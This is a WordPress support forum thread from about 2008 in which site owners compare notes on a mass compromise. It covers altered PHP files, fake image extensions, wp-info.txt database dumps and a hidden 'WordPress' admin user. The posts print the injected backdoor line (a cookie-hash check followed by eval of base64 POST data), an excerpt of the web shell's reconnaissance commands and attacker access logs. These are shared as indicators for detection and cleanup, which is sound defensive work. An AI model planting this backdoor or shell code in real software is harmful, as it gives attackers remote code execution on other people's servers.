Security issue, multiple sites

Summer
(@fpmsummer)

16 years ago

This issue actually involves several sites, running versions 2.1.3, 2.3, 2.3.1, 2.3.2, 2.3.3 and 2.5

A couple of the sites had wp-content/uploads writable so they could upload images for use in posts, and files in wp-content/themes writable so they could make theme updates from inside WP.

Back in early March, I found that several sites had been hit with the ro8kfbsmag.txt hack as mentioned in several threads here, and I’d cleaned those up and upgraded to 2.3.3, since 2.5 wasn’t yet available as a release.

This past weekend, I discovered several of those sites plus a few additional ones, including 2 brand new sites with 2.5 installed, had many of their files in the writable directories compromised, a bunch of suspicious files uploaded, and database modifications that I cannot explain.

I’m still trying to unravel the mess and clean it up, but here’s a rundown of tell-tale signs I’ve found.

Check any .php file for this code added to the top of the file:
<?php if(md5($_COOKIE['_wp_debugger'])=="--hash excised--"){ eval(base64_decode($_POST['file'])); exit; } ?>

See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on. Haven’t yet figured out where or how that info is sent to anyone.

I can send a copy of the script to anyone in WP security if needed, but I don’t know if this kind of thing is preferred to be attached, inline, or zipped, or anything.

Also see if there’s a wp-info.txt file anywhere in your hierarchy. This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

So I’ve asked all the users on those sites to update their passwords, even if they’d just changed them after the ro8kfbsmag hack, but I have to wonder if I missed anything when cleaning up after that hack that they used to continue to get in and do the more widespread and scary stuff of planting of these new scripts to collect system info.

As far as I can tell, some of these sites may have been compromised for as long as a month, but all of the added files I’ve listed here were added on Apr 10 and Apr 11, except for one site that seems to have had those changes made on Apr 5.

I am in the process of changing the DB passwords on those sites, and deleting the new “WordPress” user, but any insight on where this might have started would be welcomed. This new user also happened on sites ranging from 2.1 to 2.3 to 2.5

What I don’t know yet is if one site was the “in” door, and the rest were compromised by the one script, or if the sites were individually hacked the same way.

Viewing 15 replies - 1 through 15 (of 53 total)

1 2 3 4 →

Thread Starter Summer
(@fpmsummer)

16 years ago

Addendum: I only just noticed this this morning while still cleaning up, and it seems like they changed the WP version to 2.5 in the database.

I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels say 2.5 now. I still haven’t found a clue about this invisible user “WordPress” with no info about privileges, though.

Roy
(@gangleri)

16 years ago

There already is a thread about this subject and that one has just become active again. Maybe you want to join:
http://wordpress.org/support/topic/141041?replies=30

jedsundwall
(@jedsundwall)

16 years ago

@gangleri,

I think FPMSummer is experiencing something different that what’s being discussed on that other thread. I’m having the EXACT same problem. I’ve had to revert my server to a week and a half old backup. It’s a huge pain. I can’t tell if they accessed the wp-info.txt, but I deleted it right away.

Thread Starter Summer
(@fpmsummer)

16 years ago

Ganglieri,

that’s a different hack, but one that hit some sites on our ISP’s shared server back in January/February. They removed like 8-10 instances of that .txt file.

Jed,

what version(s) of WP are you running? I had thought that a 2.3.x site that still had user registration turned on might be responsible, but at this point I honestly don’t know where the first point of entry was, and I’m still not sure all of the users on this server have changed their passwords. I have changed all the database passwords, though.

jedsundwall
(@jedsundwall)

16 years ago

Like you, I had a number of sites running different versions. I believe most of them were the latest version before 2.5 was released. It’s difficult to tell because the hacker has changed all of my WP dashboards to say they’re running 2.5.

All of the weird files showed up on April 10th or 11th, and I didn’t notice them until today. My hosting company keep server logs for more than a couple of days, so I can’t tell what the point of entry was either.

I’m sorry I’m not of much help. All I know is that nothing obviously bad has happened yet. As soon as my server’s finished reverting back to April 5th, I’ll be upgrading everything right away.
appleo
(@appleo)

16 years ago
No real answers here either. This is just to confirm a similar situation. A server with 100+ vhosted accounts, and almost all the wordpress installations (various versions thru 2.5) were seemingly hit. All on the 11th, and every one within several minutes, according to timestamps. Which would seem to argue for a single point of entry. But the sheer volume (hundreds of files) might suggest otherwise. Almost everything was either a wordpress file, or something disguised to look like a wordpress file. The script did look for writable areas, and occasionally found non-wordpress stuff, but that was the exception. There were two signatures. Files altered as FPMSummer posted with the first line changed. And new files where all the voodoo was (422 lines), with the first line:

<?php if(md5($_COOKIE['qwerty'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){

I believe all of these were ‘qwerty’ cookies. Grepping for either of those cookie names will find all the filesystem damage. A sample of that code:
```
if(!$safe_mode){^M
if($os_type == 'nix'){^M
$os .= execute('sysctl -n kern.ostype');^M
$os .= execute('sysctl -n kern.osrelease');^M
$os .= execute('sysctl -n kernel.ostype');^M
$os .= execute('sysctl -n kernel.osrelease');^M
if(empty($user)) $user = execute('id');^M
$aliases = array(^M
'' => '',^M
'find suid files'=>'find / -type f -perm -04000 -ls',^M
'find sgid files'=>'find / -type f -perm -02000 -ls',^M
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',^M
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',^M
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',^M
'show opened ports'=>'netstat -an | grep -i listen',^M
);^M
}else{^M
$os_name .= execute('ver');^M
$user .= execute('echo %username%');^M
$aliases = array(^M
'' => '',^M
'show runing services' => 'net start',^M
'show process list' => 'tasklist'^M
);^M
}^M
}^
```
Thread Starter Summer
(@fpmsummer)

16 years ago

Yep, that’s exactly what showed up on my sites, and all on Apr 10 and Apr 11. The Apr 11 happened in two waves, 3 hours apart. The first batch of files seemed to have all been renamed _old.php, and the second batch of files were the exact same files, but with _new.php.

I had a lot of WP files with that qwerty cookie added, and several instances of the wp-info.txt with the mysql usernames/passwords dump.

I did find one file dated Apr 5, but I also saw a lot of log activity going back into March.

And how did they change my Dashboard to show WP 2.5, when they weren’t running 2.5?

ia
(@sofimi)

16 years ago

guys, i think somebody should “name” this vulnerability so it’s easier to remember. also, i wrote about it here.

yep, it happened to me too. i first saw the version 2.5 string in the footer and was immediately suspicious, but at first i thought it was because i used the wpau plugin instead of the cpanel upgrade (which i used to install wp the first time around). turns out you have to trust your instincts. 🙂

i’m also surprised all this happened on april 11 (mine on the 12th) as well.

i’ve been watching this page and will continue to do so. i hope more people contribute because it was only a few days ago when i tried googling “wp-info.txt” and practically nothing came up.

whooami
(@whooami)

16 years ago

I would agree with anyone who says this isnt just a 2.5 problem

http://www.enunabaldosa.com/deformaciones/wp-includes/wp-info.txt

The file itself appears to be gone. but because of google we can get more info

http://64.233.167.104/search?q=cache:5AHDLvNRQt8J:www.enunabaldosa.com/deformaciones/wp-includes/+wp-info.txt&hl=en&ct=clnk&cd=22&gl=us

That’s a 2.3.3 install now. There’s no telling what it was on March 19

—

Futhermore, people running anything other than 2.3.3, 2.5, or 2.0.11 have taken their security into their own hands for some time, and really ought not be surprised to wake up to a site that has been exploited.

here
(@here)

16 years ago

Codex page will hopefully help document:

http://codex.wordpress.org/Exploits/wp-info

goodspeed1
(@goodspeed1)

16 years ago

We experienced everything mentioned above over the last couple of days. April 6th & 12th. It seems systematic. Once the accounts have been compromised. The hacking began.

Here’s a few more insights on what happened: http://www.abelcheung.org/advisory/20071210-wordpress-charset.txt

steps taken:

1. Changed the admin (level 10) account passwords
2. Deleted the ‘mysterious’ WordPress admin user
3. Upgraded most of major blogs to 2.5

So far so good. (crossing my fingers)

here
(@here)

16 years ago

The wiki page was moved to http://codex.wordpress.org/User:Here/Exploits/wp-info
indigothirdeye
(@indigothirdeye)

16 years ago
The hack I believe used a vulnerability in the wp-admin/theme-editor.php. Luckily, we have a script that checks for code changes, and caught the exploit within a half hour of the attack. The logs from our site that was hacked had this in the logs:
```
194.110.162.79 - - [15/Apr/2008:14:40:02 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 30
2 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
194.110.162.79 - - [15/Apr/2008:14:40:03 -0700] "GET /wp-login.php?redirect_to=%2Fwp-admin%2Ftheme-editor.php%3Ffile%3Dwp-content%2Fthemes%2Fdefault%2Findex.
php%26theme%3DWordPress%2BDefault HTTP/1.1" 200 2043 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
194.110.162.79 - - [15/Apr/2008:14:40:03 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 20
0 9620 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
194.110.162.79 - - [15/Apr/2008:14:40:04 -0700] "POST /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 3
02 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
194.110.162.79 - - [15/Apr/2008:14:40:04 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default&a=te HTTP/1.
1" 200 9832 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
194.110.162.79 - - [15/Apr/2008:14:40:05 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
194.110.162.79 - - [15/Apr/2008:14:40:06 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 7895 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; e
n-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
194.110.162.79 - - [15/Apr/2008:14:40:07 -0700] "POST /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 3
02 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
194.110.162.79 - - [15/Apr/2008:14:40:08 -0700] "GET /wp-login.php HTTP/1.1" 200 1835 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/
20070309 Firefox/2.0.0.3"
```
Both sites had the WordPress and WordPressx user added to the wp-users table. Neither had a wp-info.txt luckily, but many of the .giff and .pngg’s were found. There were also 2 files in the /tmp/ directory numbered 1 and 2 with full directory listings of the sites. We immediately launched a “Deny any” on the theme-editor.php files to prevent further attacks using this method and cleaned up what we could find.
whooami
(@whooami)

16 years ago

thats not the exploit. thats the file access that done after someone has admin access. AND if you attempt to call that file without being logged in, and having the proper permissions, you will find you are promptly redirected to logging in, just as you ought to be

You cannot access that file as a simple subscriber. You must be an admin

Devs (Donncha, specifically) has already looked at something similar weeks ago, when I originally saw it happening on another blog that hand been exploited.

Want to know what ultimtely solved the hacking?

1. upgrading the blog
2. changing the admin passwords
3. changing all the cookies.

and the deny all.. that just forces apache to do work it doesnt need to. If you’re going to block everyone from using the file, delete it, or crtl-k the content.

You dont gain anything by looking at 403’s — theyre all proxies or rooted shells.

None of this is new, and Im willing to continue playing devil’s advocate and say that until someone comes up with real evidence that 2.5, or even 2.3 is the root cause of the problem.. that it’s useless conjecture and fear mongering.

If someone has admin access they do can do whatever your file permissions allow, it’s just that simple. And if they can write to a file, they can create a root shell. If they can create a root shell, they can add users to your database, etc.. They also no longer need admin access once the php root shell is in place.

Thats why when a new version comes out, ppl are urged to upgrade. Countless numbers dont.

This is specifically why I have suggested setting up logging on some of these blogs —

1. youre missing the key piece of the puzzle : how they got admin access in the first place.

—

In fact, you posted the login in your paste above. They can be seen logging in.

ia
(@sofimi)

16 years ago

yeah, i do want to know how they got admin access as well. fyi, after i wrote about this security issue, the “WordPress” user appeared in the database(s) again. does this mean i’d have to generate new database passwords all over again? sigh.